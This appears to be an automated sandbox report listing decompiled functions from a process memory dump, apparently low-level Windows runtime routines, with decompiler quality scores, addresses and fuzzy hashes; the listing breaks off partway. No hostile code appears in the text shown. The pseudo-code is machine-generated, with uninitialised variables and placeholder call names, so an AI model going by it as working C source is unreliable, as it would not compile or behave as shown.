                        C-Code - Quality: 69%
                        			E02C169A6(signed short* __ecx, void* __eflags) {
                        				signed int _v8;
                        				signed int _v16;
                        				intOrPtr _v20;
                        				signed int _v24;
                        				signed short _v28;
                        				signed int _v32;
                        				intOrPtr _v36;
                        				signed int _v40;
                        				char* _v44;
                        				signed int _v48;
                        				intOrPtr _v52;
                        				signed int _v56;
                        				char _v60;
                        				signed int _v64;
                        				char _v68;
                        				char _v72;
                        				signed short* _v76;
                        				signed int _v80;
                        				char _v84;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* _t68;
                        				intOrPtr _t73;
                        				signed short* _t74;
                        				void* _t77;
                        				void* _t78;
                        				signed int _t79;
                        				signed int _t80;
                        
                        				_v8 =  *0x2c8d360 ^ _t80;
                        				_t75 = 0x100;
                        				_v64 = _v64 & 0x00000000;
                        				_v76 = __ecx;
                        				_t79 = 0;
                        				_t68 = 0;
                        				_v72 = 1;
                        				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
                        				_t77 = 0;
                        				if(L02BA6C59(__ecx[2], 0x100, __eflags) != 0) {
                        					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                        					if(_t79 != 0 && E02C16BA3() != 0) {
                        						_push(0);
                        						_push(0);
                        						_push(0);
                        						_push(0x1f0003);
                        						_push( &_v64);
                        						if(E02BD9980() >= 0) {
                        							E02BB2280(_t56, 0x2c88778);
                        							_t77 = 1;
                        							_t68 = 1;
                        							if( *0x2c88774 == 0) {
                        								asm("cdq");
                        								 *(_t79 + 0xf70) = _v64;
                        								 *(_t79 + 0xf74) = 0x100;
                        								_t75 = 0;
                        								_t73 = 4;
                        								_v60 =  &_v68;
                        								_v52 = _t73;
                        								_v36 = _t73;
                        								_t74 = _v76;
                        								_v44 =  &_v72;
                        								 *0x2c88774 = 1;
                        								_v56 = 0;
                        								_v28 = _t74[2];
                        								_v48 = 0;
                        								_v20 = ( *_t74 & 0x0000ffff) + 2;
                        								_v40 = 0;
                        								_v32 = 0;
                        								_v24 = 0;
                        								_v16 = 0;
                        								if(E02B9B6F0(0x2b7c338, 0x2b7c288, 3,  &_v60) == 0) {
                        									_v80 = _v80 | 0xffffffff;
                        									_push( &_v84);
                        									_push(0);
                        									_push(_v64);
                        									_v84 = 0xfa0a1f00;
                        									E02BD9520();
                        								}
                        							}
                        						}
                        					}
                        				}
                        				if(_v64 != 0) {
                        					_push(_v64);
                        					E02BD95D0();
                        					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
                        					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
                        				}
                        				if(_t77 != 0) {
                        					E02BAFFB0(_t68, _t77, 0x2c88778);
                        				}
                        				_pop(_t78);
                        				return E02BDB640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
                        			}
































                        0x02c169b5
                        0x02c169be
                        0x02c169c3
                        0x02c169c9
                        0x02c169cc
                        0x02c169d1
                        0x02c169d3
                        0x02c169de
                        0x02c169e1
                        0x02c169ea
                        0x02c169f6
                        0x02c169fe
                        0x02c16a13
                        0x02c16a14
                        0x02c16a15
                        0x02c16a16
                        0x02c16a1e
                        0x02c16a26
                        0x02c16a31
                        0x02c16a36
                        0x02c16a37
                        0x02c16a40
                        0x02c16a49
                        0x02c16a4a
                        0x02c16a53
                        0x02c16a59
                        0x02c16a5d
                        0x02c16a5e
                        0x02c16a64
                        0x02c16a67
                        0x02c16a6a
                        0x02c16a6d
                        0x02c16a70
                        0x02c16a77
                        0x02c16a7d
                        0x02c16a86
                        0x02c16a89
                        0x02c16a9c
                        0x02c16a9f
                        0x02c16aa2
                        0x02c16aa5
                        0x02c16aaf
                        0x02c16ab1
                        0x02c16ab8
                        0x02c16ab9
                        0x02c16abb
                        0x02c16abe
                        0x02c16ac5
                        0x02c16ac5
                        0x02c16aaf
                        0x02c16a40
                        0x02c16a26
                        0x02c169fe
                        0x02c16ace
                        0x02c16ad0
                        0x02c16ad3
                        0x02c16ad8
                        0x02c16adf
                        0x02c16adf
                        0x02c16ae8
                        0x02c16aef
                        0x02c16aef
                        0x02c16af9
                        0x02c16b06

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 02eb904df552c2dcd7a3502bd6d5d14e9647e2730355dcd5aaeea19f3fbdb69a
                        • Instruction ID: 212a177e5801064880fe421c1e64a9e402a4a2493d30cf9c4f4c771f5efc3a3c
                        • Opcode Fuzzy Hash: 02eb904df552c2dcd7a3502bd6d5d14e9647e2730355dcd5aaeea19f3fbdb69a
                        • Instruction Fuzzy Hash: 3F41C0B1D40208AFDB14DFA4D841BFEBBF9EF49718F14826AE814A3280EB709945DF50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 85%
                        			E02B95210(intOrPtr _a4, void* _a8) {
                        				void* __ecx;
                        				intOrPtr _t31;
                        				signed int _t32;
                        				signed int _t33;
                        				intOrPtr _t35;
                        				signed int _t52;
                        				void* _t54;
                        				void* _t56;
                        				unsigned int _t59;
                        				signed int _t60;
                        				void* _t61;
                        
                        				_t61 = E02B952A5(1);
                        				if(_t61 == 0) {
                        					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                        					_t54 =  *((intOrPtr*)(_t31 + 0x28));
                        					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
                        				} else {
                        					_t54 =  *((intOrPtr*)(_t61 + 0x10));
                        					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
                        				}
                        				_t60 = _t59 >> 1;
                        				_t32 = 0x3a;
                        				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
                        					_t52 = _t60 + _t60;
                        					if(_a4 > _t52) {
                        						goto L5;
                        					}
                        					if(_t61 != 0) {
                        						asm("lock xadd [esi], eax");
                        						if((_t32 | 0xffffffff) == 0) {
                        							_push( *((intOrPtr*)(_t61 + 4)));
                        							E02BD95D0();
                        							L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                        						}
                        					} else {
                        						E02BAEB70(_t54, 0x2c879a0);
                        					}
                        					_t26 = _t52 + 2; // 0xddeeddf0
                        					return _t26;
                        				} else {
                        					_t52 = _t60 + _t60;
                        					if(_a4 < _t52) {
                        						if(_t61 != 0) {
                        							asm("lock xadd [esi], eax");
                        							if((_t32 | 0xffffffff) == 0) {
                        								_push( *((intOrPtr*)(_t61 + 4)));
                        								E02BD95D0();
                        								L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                        							}
                        						} else {
                        							E02BAEB70(_t54, 0x2c879a0);
                        						}
                        						return _t52;
                        					}
                        					L5:
                        					_t33 = E02BDF3E0(_a8, _t54, _t52);
                        					if(_t61 == 0) {
                        						E02BAEB70(_t54, 0x2c879a0);
                        					} else {
                        						asm("lock xadd [esi], eax");
                        						if((_t33 | 0xffffffff) == 0) {
                        							_push( *((intOrPtr*)(_t61 + 4)));
                        							E02BD95D0();
                        							L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                        						}
                        					}
                        					_t35 = _a8;
                        					if(_t60 <= 1) {
                        						L9:
                        						_t60 = _t60 - 1;
                        						 *((short*)(_t52 + _t35 - 2)) = 0;
                        						goto L10;
                        					} else {
                        						_t56 = 0x3a;
                        						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
                        							 *((short*)(_t52 + _t35)) = 0;
                        							L10:
                        							return _t60 + _t60;
                        						}
                        						goto L9;
                        					}
                        				}
                        			}














                        0x02b95220
                        0x02b95224
                        0x02bf0d13
                        0x02bf0d16
                        0x02bf0d19
                        0x02b9522a
                        0x02b9522a
                        0x02b9522d
                        0x02b9522d
                        0x02b95231
                        0x02b95235
                        0x02b95239
                        0x02bf0d5c
                        0x02bf0d62
                        0x00000000
                        0x00000000
                        0x02bf0d6a
                        0x02bf0d7b
                        0x02bf0d7f
                        0x02bf0d81
                        0x02bf0d84
                        0x02bf0d95
                        0x02bf0d95
                        0x02bf0d6c
                        0x02bf0d71
                        0x02bf0d71
                        0x02bf0d9a
                        0x00000000
                        0x02b9524a
                        0x02b9524a
                        0x02b95250
                        0x02bf0d24
                        0x02bf0d35
                        0x02bf0d39
                        0x02bf0d3b
                        0x02bf0d3e
                        0x02bf0d50
                        0x02bf0d50
                        0x02bf0d26
                        0x02bf0d2b
                        0x02bf0d2b
                        0x00000000
                        0x02bf0d55
                        0x02b95256
                        0x02b9525b
                        0x02b95265
                        0x02bf0da7
                        0x02b9526b
                        0x02b9526e
                        0x02b95272
                        0x02bf0db1
                        0x02bf0db4
                        0x02bf0dc5
                        0x02bf0dc5
                        0x02b95272
                        0x02b95278
                        0x02b9527e
                        0x02b9528a
                        0x02b9528c
                        0x02b9528d
                        0x00000000
                        0x02b95280
                        0x02b95282
                        0x02b95288
                        0x02b9529f
                        0x02b95292
                        0x00000000
                        0x02b95292
                        0x00000000
                        0x02b95288
                        0x02b9527e

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6ec34b97b135cca3d4e1ed91254c7ff2140134984d7596284425e75445af359f
                        • Instruction ID: 95aea1a22100b005c2d9cd81f3556942e8598dc455e51690dae0bff6d6412e40
                        • Opcode Fuzzy Hash: 6ec34b97b135cca3d4e1ed91254c7ff2140134984d7596284425e75445af359f
                        • Instruction Fuzzy Hash: 5A312A32241600DBCB76BF18C890B76B7A6FF00764F514AB9E9550B5B6EB71E804CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 78%
                        			E02BCA61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                        				intOrPtr _t35;
                        				intOrPtr _t39;
                        				intOrPtr _t45;
                        				intOrPtr* _t51;
                        				intOrPtr* _t52;
                        				intOrPtr* _t55;
                        				signed int _t57;
                        				intOrPtr* _t59;
                        				intOrPtr _t68;
                        				intOrPtr* _t77;
                        				void* _t79;
                        				signed int _t80;
                        				intOrPtr _t81;
                        				char* _t82;
                        				void* _t83;
                        
                        				_push(0x24);
                        				_push(0x2c70220);
                        				E02BED08C(__ebx, __edi, __esi);
                        				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
                        				_t79 = __ecx;
                        				_t35 =  *0x2c87b9c; // 0x0
                        				_t55 = L02BB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
                        				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
                        				if(_t55 == 0) {
                        					_t39 = 0xc0000017;
                        					L11:
                        					return E02BED0D1(_t39);
                        				}
                        				_t68 = 0;
                        				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
                        				 *(_t83 - 4) =  *(_t83 - 4) & 0;
                        				_t7 = _t55 + 8; // 0x8
                        				_t57 = 6;
                        				memcpy(_t7, _t79, _t57 << 2);
                        				_t80 = 0xfffffffe;
                        				 *(_t83 - 4) = _t80;
                        				if(0 < 0) {
                        					L14:
                        					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                        					L20:
                        					L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
                        					_t39 = _t81;
                        					goto L11;
                        				}
                        				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
                        					_t81 = 0xc000007b;
                        					goto L20;
                        				}
                        				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
                        					_t59 =  *((intOrPtr*)(_t83 + 8));
                        					_t45 =  *_t59;
                        					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
                        					 *_t59 = _t45 + 1;
                        					L6:
                        					 *(_t83 - 4) = 1;
                        					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
                        					 *(_t83 - 4) = _t80;
                        					if(_t68 < 0) {
                        						_t82 =  *((intOrPtr*)(_t83 + 0xc));
                        						if(_t82 == 0) {
                        							goto L14;
                        						}
                        						asm("btr eax, ecx");
                        						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                        						if( *_t82 != 0) {
                        							 *0x2c87b10 =  *0x2c87b10 - 8;
                        						}
                        						goto L20;
                        					}
                        					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
                        					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
                        					_t51 =  *0x2c8536c; // 0x2733fc0
                        					if( *_t51 != 0x2c85368) {
                        						_push(3);
                        						asm("int 0x29");
                        						goto L14;
                        					}
                        					 *_t55 = 0x2c85368;
                        					 *((intOrPtr*)(_t55 + 4)) = _t51;
                        					 *_t51 = _t55;
                        					 *0x2c8536c = _t55;
                        					_t52 =  *((intOrPtr*)(_t83 + 0x10));
                        					if(_t52 != 0) {
                        						 *_t52 = _t55;
                        					}
                        					_t39 = 0;
                        					goto L11;
                        				}
                        				_t77 =  *((intOrPtr*)(_t83 + 8));
                        				_t68 = E02BCA70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
                        				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
                        				if(_t68 < 0) {
                        					goto L14;
                        				}
                        				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
                        				goto L6;
                        			}


















                        0x02bca61c
                        0x02bca61e
                        0x02bca623
                        0x02bca628
                        0x02bca62b
                        0x02bca62d
                        0x02bca648
                        0x02bca64a
                        0x02bca64f
                        0x02c09b44
                        0x02bca6ec
                        0x02bca6f1
                        0x02bca6f1
                        0x02bca655
                        0x02bca657
                        0x02bca65a
                        0x02bca65d
                        0x02bca662
                        0x02bca663
                        0x02bca667
                        0x02bca668
                        0x02bca66d
                        0x02bca706
                        0x02bca706
                        0x02c09bda
                        0x02c09be6
                        0x02c09beb
                        0x00000000
                        0x02c09beb
                        0x02bca679
                        0x02c09b7a
                        0x00000000
                        0x02c09b7a
                        0x02bca683
                        0x02bca6f4
                        0x02bca6f7
                        0x02bca6f9
                        0x02bca6fd
                        0x02bca6a0
                        0x02bca6a0
                        0x02bca6ad
                        0x02bca6af
                        0x02bca6b4
                        0x02c09ba7
                        0x02c09bac
                        0x00000000
                        0x00000000
                        0x02c09bc6
                        0x02c09bce
                        0x02c09bd1
                        0x02c09bd3
                        0x02c09bd3
                        0x00000000
                        0x02c09bd1
                        0x02bca6bd
                        0x02bca6c3
                        0x02bca6c6
                        0x02bca6d2
                        0x02bca701
                        0x02bca704
                        0x00000000
                        0x02bca704
                        0x02bca6d4
                        0x02bca6d6
                        0x02bca6d9
                        0x02bca6db
                        0x02bca6e1
                        0x02bca6e6
                        0x02bca6e8
                        0x02bca6e8
                        0x02bca6ea
                        0x00000000
                        0x02bca6ea
                        0x02bca688
                        0x02bca692
                        0x02bca694
                        0x02bca699
                        0x00000000
                        0x00000000
                        0x02bca69d
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 526cda58d992e4b870aa7c1dd5990f7f1f1d8c48032b634d206bb6a8cb85e44e
                        • Instruction ID: c51f3432911099f7b7987f29068cca159794fae168d680a339475311c9a8cf66
                        • Opcode Fuzzy Hash: 526cda58d992e4b870aa7c1dd5990f7f1f1d8c48032b634d206bb6a8cb85e44e
                        • Instruction Fuzzy Hash: 7C415A75A00209DFCB15CF58C890BA9BBF2FB49714F25C1AEE805AB381D774A941CF50
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02BD3D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
                        				intOrPtr _v8;
                        				char _v12;
                        				signed short** _t33;
                        				short* _t38;
                        				intOrPtr* _t39;
                        				intOrPtr* _t41;
                        				signed short _t43;
                        				intOrPtr* _t47;
                        				intOrPtr* _t53;
                        				signed short _t57;
                        				intOrPtr _t58;
                        				signed short _t60;
                        				signed short* _t61;
                        
                        				_t47 = __ecx;
                        				_t61 = __edx;
                        				_t60 = ( *__ecx & 0x0000ffff) + 2;
                        				if(_t60 > 0xfffe) {
                        					L22:
                        					return 0xc0000106;
                        				}
                        				if(__edx != 0) {
                        					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
                        						L5:
                        						E02BA7B60(0, _t61, 0x2b711c4);
                        						_v12 =  *_t47;
                        						_v12 = _v12 + 0xfff8;
                        						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
                        						E02BA7B60(0xfff8, _t61,  &_v12);
                        						_t33 = _a8;
                        						if(_t33 != 0) {
                        							 *_t33 = _t61;
                        						}
                        						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
                        						_t53 = _a12;
                        						if(_t53 != 0) {
                        							_t57 = _t61[2];
                        							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
                        							while(_t38 >= _t57) {
                        								if( *_t38 == 0x5c) {
                        									_t41 = _t38 + 2;
                        									if(_t41 == 0) {
                        										break;
                        									}
                        									_t58 = 0;
                        									if( *_t41 == 0) {
                        										L19:
                        										 *_t53 = _t58;
                        										goto L7;
                        									}
                        									 *_t53 = _t41;
                        									goto L7;
                        								}
                        								_t38 = _t38 - 2;
                        							}
                        							_t58 = 0;
                        							goto L19;
                        						} else {
                        							L7:
                        							_t39 = _a16;
                        							if(_t39 != 0) {
                        								 *_t39 = 0;
                        								 *((intOrPtr*)(_t39 + 4)) = 0;
                        								 *((intOrPtr*)(_t39 + 8)) = 0;
                        								 *((intOrPtr*)(_t39 + 0xc)) = 0;
                        							}
                        							return 0;
                        						}
                        					}
                        					_t61 = _a4;
                        					if(_t61 != 0) {
                        						L3:
                        						_t43 = L02BB4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
                        						_t61[2] = _t43;
                        						if(_t43 == 0) {
                        							return 0xc0000017;
                        						}
                        						_t61[1] = _t60;
                        						 *_t61 = 0;
                        						goto L5;
                        					}
                        					goto L22;
                        				}
                        				_t61 = _a4;
                        				if(_t61 == 0) {
                        					return 0xc000000d;
                        				}
                        				goto L3;
                        			}
















                        0x02bd3d4c
                        0x02bd3d50
                        0x02bd3d55
                        0x02bd3d5e
                        0x02c0e79a
                        0x00000000
                        0x02c0e79a
                        0x02bd3d68
                        0x02c0e789
                        0x02bd3d9d
                        0x02bd3da3
                        0x02bd3daf
                        0x02bd3db5
                        0x02bd3dbc
                        0x02bd3dc4
                        0x02bd3dc9
                        0x02bd3dce
                        0x02c0e7ae
                        0x02c0e7ae
                        0x02bd3dde
                        0x02bd3de2
                        0x02bd3de7
                        0x02bd3e0d
                        0x02bd3e13
                        0x02bd3e16
                        0x02bd3e1e
                        0x02bd3e25
                        0x02bd3e28
                        0x00000000
                        0x00000000
                        0x02bd3e2a
                        0x02bd3e2f
                        0x02bd3e37
                        0x02bd3e37
                        0x00000000
                        0x02bd3e37
                        0x02bd3e31
                        0x00000000
                        0x02bd3e31
                        0x02bd3e20
                        0x02bd3e20
                        0x02bd3e35
                        0x00000000
                        0x02bd3de9
                        0x02bd3de9
                        0x02bd3de9
                        0x02bd3dee
                        0x02bd3dfd
                        0x02bd3dff
                        0x02bd3e02
                        0x02bd3e05
                        0x02bd3e05
                        0x00000000
                        0x02bd3df0
                        0x02bd3de7
                        0x02c0e78f
                        0x02c0e794
                        0x02bd3d79
                        0x02bd3d84
                        0x02bd3d89
                        0x02bd3d8e
                        0x00000000
                        0x02c0e7a4
                        0x02bd3d96
                        0x02bd3d9a
                        0x00000000
                        0x02bd3d9a
                        0x00000000
                        0x02c0e794
                        0x02bd3d6e
                        0x02bd3d73
                        0x00000000
                        0x02c0e7b5
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a75ed00be1a5534979e99bf723580cc2709513597a5e61aecfbe630432c3f3e5
                        • Instruction ID: 09cfa7c9bebe595fef7bf1648937299959d314e6e591017ab8ef8e3b2f3385d0
                        • Opcode Fuzzy Hash: a75ed00be1a5534979e99bf723580cc2709513597a5e61aecfbe630432c3f3e5
                        • Instruction Fuzzy Hash: A5319071605615DBC7258F2DC891ABABBF5EF85700B0584EAE849CB391F770D840CFA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 76%
                        			E02C17016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
                        				signed int _v8;
                        				char _v588;
                        				intOrPtr _v592;
                        				intOrPtr _v596;
                        				signed short* _v600;
                        				char _v604;
                        				short _v606;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				signed short* _t55;
                        				void* _t56;
                        				signed short* _t58;
                        				signed char* _t61;
                        				char* _t68;
                        				void* _t69;
                        				void* _t71;
                        				void* _t72;
                        				signed int _t75;
                        
                        				_t64 = __edx;
                        				_t77 = (_t75 & 0xfffffff8) - 0x25c;
                        				_v8 =  *0x2c8d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
                        				_t55 = _a16;
                        				_v606 = __ecx;
                        				_t71 = 0;
                        				_t58 = _a12;
                        				_v596 = __edx;
                        				_v600 = _t58;
                        				_t68 =  &_v588;
                        				if(_t58 != 0) {
                        					_t71 = ( *_t58 & 0x0000ffff) + 2;
                        					if(_t55 != 0) {
                        						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
                        					}
                        				}
                        				_t8 = _t71 + 0x2a; // 0x28
                        				_t33 = _t8;
                        				_v592 = _t8;
                        				if(_t71 <= 0x214) {
                        					L6:
                        					 *((short*)(_t68 + 6)) = _v606;
                        					if(_t64 != 0xffffffff) {
                        						asm("cdq");
                        						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
                        						 *((char*)(_t68 + 0x28)) = _a4;
                        						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
                        						 *((char*)(_t68 + 0x29)) = _a8;
                        						if(_t71 != 0) {
                        							_t22 = _t68 + 0x2a; // 0x2a
                        							_t64 = _t22;
                        							E02C16B4C(_t58, _t22, _t71,  &_v604);
                        							if(_t55 != 0) {
                        								_t25 = _v604 + 0x2a; // 0x2a
                        								_t64 = _t25 + _t68;
                        								E02C16B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
                        							}
                        							if(E02BB7D50() == 0) {
                        								_t61 = 0x7ffe0384;
                        							} else {
                        								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        							}
                        							_push(_t68);
                        							_push(_v592 + 0xffffffe0);
                        							_push(0x402);
                        							_push( *_t61 & 0x000000ff);
                        							E02BD9AE0();
                        						}
                        					}
                        					_t35 =  &_v588;
                        					if( &_v588 != _t68) {
                        						_t35 = L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
                        					}
                        					L16:
                        					_pop(_t69);
                        					_pop(_t72);
                        					_pop(_t56);
                        					return E02BDB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
                        				}
                        				_t68 = L02BB4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
                        				if(_t68 == 0) {
                        					goto L16;
                        				} else {
                        					_t58 = _v600;
                        					_t64 = _v596;
                        					goto L6;
                        				}
                        			}






















                        0x02c17016
                        0x02c1701e
                        0x02c1702b
                        0x02c17033
                        0x02c17037
                        0x02c1703c
                        0x02c1703e
                        0x02c17041
                        0x02c17045
                        0x02c1704a
                        0x02c17050
                        0x02c17055
                        0x02c1705a
                        0x02c17062
                        0x02c17062
                        0x02c1705a
                        0x02c17064
                        0x02c17064
                        0x02c17067
                        0x02c17071
                        0x02c17096
                        0x02c1709b
                        0x02c170a2
                        0x02c170a6
                        0x02c170a7
                        0x02c170ad
                        0x02c170b3
                        0x02c170b6
                        0x02c170bb
                        0x02c170c3
                        0x02c170c3
                        0x02c170c6
                        0x02c170cd
                        0x02c170dd
                        0x02c170e0
                        0x02c170e2
                        0x02c170e2
                        0x02c170ee
                        0x02c17101
                        0x02c170f0
                        0x02c170f9
                        0x02c170f9
                        0x02c1710a
                        0x02c1710e
                        0x02c17112
                        0x02c17117
                        0x02c17118
                        0x02c17118
                        0x02c170bb
                        0x02c1711d
                        0x02c17123
                        0x02c17131
                        0x02c17131
                        0x02c17136
                        0x02c1713d
                        0x02c1713e
                        0x02c1713f
                        0x02c1714a
                        0x02c1714a
                        0x02c17084
                        0x02c17088
                        0x00000000
                        0x02c1708e
                        0x02c1708e
                        0x02c17092
                        0x00000000
                        0x02c17092

                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp Download File
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ff827c4154e987613a001c1244f0c7b858bf2b9f651ffb1d05f768868374b59a
                        • Instruction ID: 50218eb351b2973a92bdf93c7d3539388084723355bf1007f7324d1ab278a25b
                        • Opcode Fuzzy Hash: ff827c4154e987613a001c1244f0c7b858bf2b9f651ffb1d05f768868374b59a
                        • Instruction Fuzzy Hash: 6931C4726047519BC321DF28CC41AAAF3E9FFC9700F144A29F89987690E730E904DBA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 68%
                        			E02BBC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
                        				signed int* _v8;
                        				char _v16;
                        				void* __ebx;
                        				void* __edi;
                        				signed char _t33;
                        				signed char _t43;
                        				signed char _t48;
                        				signed char _t62;
                        				void* _t63;
                        				intOrPtr _t69;
                        				intOrPtr _t71;
                        				unsigned int* _t82;
                        				void* _t83;
                        
                        				_t80 = __ecx;
                        				_t82 = __edx;
                        				_t33 =  *((intOrPtr*)(__ecx + 0xde));
                        				_t62 = _t33 >> 0x00000001 & 0x00000001;
                        				if((_t33 & 0x00000001) != 0) {
                        					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
                        					if(E02BB7D50() != 0) {
                        						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        					} else {
                        						_t43 = 0x7ffe0386;
                        					}
                        					if( *_t43 != 0) {
                        						_t43 = E02C68D34(_v8, _t80);
                        					}
                        					E02BB2280(_t43, _t82);
                        					if( *((char*)(_t80 + 0xdc)) == 0) {
                        						E02BAFFB0(_t62, _t80, _t82);
                        						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
                        						_t30 = _t80 + 0xd0; // 0xd0
                        						_t83 = _t30;
                        						E02C68833(_t83,  &_v16);
                        						_t81 = _t80 + 0x90;
                        						E02BAFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
                        						_t63 = 0;
                        						_push(0);
                        						_push(_t83);
                        						_t48 = E02BDB180();
                        						if(_a4 != 0) {
                        							E02BB2280(_t48, _t81);
                        						}
                        					} else {
                        						_t69 = _v8;
                        						_t12 = _t80 + 0x98; // 0x98
                        						_t13 = _t69 + 0xc; // 0x575651ff
                        						E02BBBB2D(_t13, _t12);
                        						_t71 = _v8;
                        						_t15 = _t80 + 0xb0; // 0xb0
                        						_t16 = _t71 + 8; // 0x8b000cc2
                        						E02BBBB2D(_t16, _t15);
                        						E02BBB944(_v8, _t62);
                        						 *((char*)(_t80 + 0xdc)) = 0;
                        						E02BAFFB0(0, _t80, _t82);
                        						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
                        						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
                        						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
                        						 *(_t80 + 0xde) = 0;
                        						if(_a4 == 0) {
                        							_t25 = _t80 + 0x90; // 0x90
                        							E02BAFFB0(0, _t80, _t25);
                        						}
                        						_t63 = 1;
                        					}
                        					return _t63;
                        				}
                        				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
                        				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
                        				if(_a4 == 0) {
                        					_t24 = _t80 + 0x90; // 0x90
                        					E02BAFFB0(0, __ecx, _t24);
                        				}
                        				return 0;
                        			}
















                        0x02bbc18d
                        0x02bbc18f
                        0x02bbc191
                        0x02bbc19b
                        0x02bbc1a0
                        0x02bbc1d4
                        0x02bbc1de
                        0x02c02d6e
                        0x02bbc1e4
